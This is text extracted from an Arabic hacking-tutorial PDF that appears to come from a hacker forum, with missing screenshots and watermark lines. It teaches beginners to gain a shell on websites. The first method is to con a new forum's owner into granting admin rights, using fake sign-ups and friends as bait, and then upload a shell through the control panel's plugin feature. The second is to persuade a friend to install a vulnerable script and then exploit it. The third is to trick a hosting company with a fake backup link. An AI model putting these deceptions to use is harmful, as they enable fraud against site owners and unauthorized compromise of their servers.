zedt.zip
فهذي هنا php طيب واذا تبي بصيغة
نفس الرابط الاول بالماوسالايمن ثم حفظ بأسم
PDF created with pdfFactory Pro trial version www.pdffactory.com
http://www.members.lycos.co.uk/powerhosting/
php.zip
حيل للحصول على شل على السيرفر بدون وجود ثغرات
هذي الحيل وحفظ لحقوق صاحبها
هي من حيل ابو عابد صاحب موقع بيت الهكر
www.v99x.com/vb
الحيله الاولى
هذي الحيله طبقتها اكثر من مره وعلى اكثر من موقع
انا طبقت الحيله بهذي الخطوات
الحصول على ايميل صاحب الموقع ·
ان يكون الموقع لعمل هذي الحيله ان يكون جديد يعني ·
ماتروح لموقع اعضائه عشرين الف انسى انها تزبط الحيله
اول شئ عليك بالمشاركه في هذا الموقع الجديد وقبلها الحصول
على ايميل صاحب الموقع لماتسولف معه بالمسن قله بجيب لك
PDF created with pdfFactory Pro trial version www.pdffactory.com
اعضاء وبشارك وبخلي منتداك يكون افضل منتدى يعني من
الأخير انصب عليه
وحنا عارفين ان منتداه جديد واي واحد منتداه جديد يبي
اعضاء يبي موقعه يشتهر بأسرع وقت وقتها بيوافق وبعضهم
يقول روح جيب لي اعضاء اول
روح جب له كم عضو الطريق
يأما انك تسوي تسجيل خروج وتدخل وتسجل بنك ثاني على
انك عضو جديد
ويأما انك تكلم اخوياك يسجلون
وروح عنده قل هذا انا جبت اعضاء أبي اداره بالموقع زي
ماوعدتني انت
لاتكون مصر مره على الاداره عشان مايشك فيك جيبها بأسلوب
حلو
من الاخير هذي الحيله تعتمد على اسلوبك في الكلام والتحدث
والنصب...*_^
والله ياخوفي ينصب عليكم يقول جيبوا اعضاء وانت صداق تروح
تجيب اعضاء وتشارك وفي الاخير يقول لك الخلا مافي اداره تبي
تشارك شارك ماتبي الخلا هههههههههههه
*_^
PDF created with pdfFactory Pro trial version www.pdffactory.com
بتفتح لك بعدين هالصفحه
في الخيارات الي على يسار الشاشه انزل تحت تلاقي خيار
Plugins الهاكات Product
تابع الشرح
PDF created with pdfFactory Pro trial version www.pdffactory.com
بعد مايتم رفع الملف
ان الملف راح ارفه لكم بعد ماكمل من هالشرح البسيط ◌ علما
ٌٌ
الف مبروك *_^
خلاصتم رفع الشل من لوحة تحكم المنتدى
PDF created with pdfFactory Pro trial version www.pdffactory.com
الحين كملنا من الحيله الاولى وشرحناها شرح كامل
ندخل في الحيله الثانيه ونبدأ نشرحها
الحيله مايحتاج لها شرح مثلا خويك بلأيميل معك وعنده موقع
وتبي تخترق موقعه وانت عارف سكريبت خطير وعارف تستغل
ثغرته
روح قله ياقلبي في سكريبت حلو مره وزين ويفيد و...و...و..
المهم خله يعجب بسكريبت وخله يركبه
بعد مايركبه بسرعه روح استغل ثغرة السكريبت
حيلة الباك اب من اكتشاف ابو عابد
روح لأي شركة استضافه وقل لهم انا عندي موقع وعشان سؤ
الشركه الاولى اظطريت اجيكم وانا كلي امل ان تقفوا معي
انا حقيقه عندي باك اب لموقعي وهذا رابطه
/http://3nawen.com/backup
ابيكم تنقلونه على سيرفركم وابيكم تعطوني مساحه اجرب
الباك اب
PDF created with pdfFactory Pro trial version www.pdffactory.com
وبنسبه للفلوسلاتهتموا أي مبلغ تبونه راح اعطيكم اياه المهم
ابي اجرب اول
بيقول توكلنا على الله ويعطيك المساحه اول ماتدخل على الباك
اب تلاقي السيرفر كله بين يديك تسوي فيه الي تبي
بينما هالفكره ماراح تظبط لأن الشركه راح تجرب الرابط قبل
التعطيك وبيعرفون خدعتك
هذي حيل بسيطه عجبتني ونقلتها لكم وضعتها بين ايديكم
لكي تستفيدوا منها في بعضالمواقع المحميه حمايه قويه
◌ قد تفيدكم هذه الحيل كثيرا
ٌٌ
اهم شئ في الهكر الصبر وكثرة القرأه
لحد كذا كافي لكل مبتدأ اتوقع ان الكل الان فهم هكر المواقع زين
وفهم وشلون يستغل ثغرات وفهم طريقة البحث وطريقة رفع
اندكس اختراق
اتوقع كل شئ شرحته فهمتموه
وانا راح اكون مع أي مبتدأ وراح اساعد كل مبتدأ
PDF created with pdfFactory Pro trial version www.pdffactory.com
وهذا ايميلي لأي استفسار او أي ملاحضات او حتى أي اقتراحات
M5aui@w.cn
هذا الكتاب اهداء الى منتديات بيت الهكرز
www.v99x.com
تقبلوا تحيات اخوكم
مخاوي الهم
PDF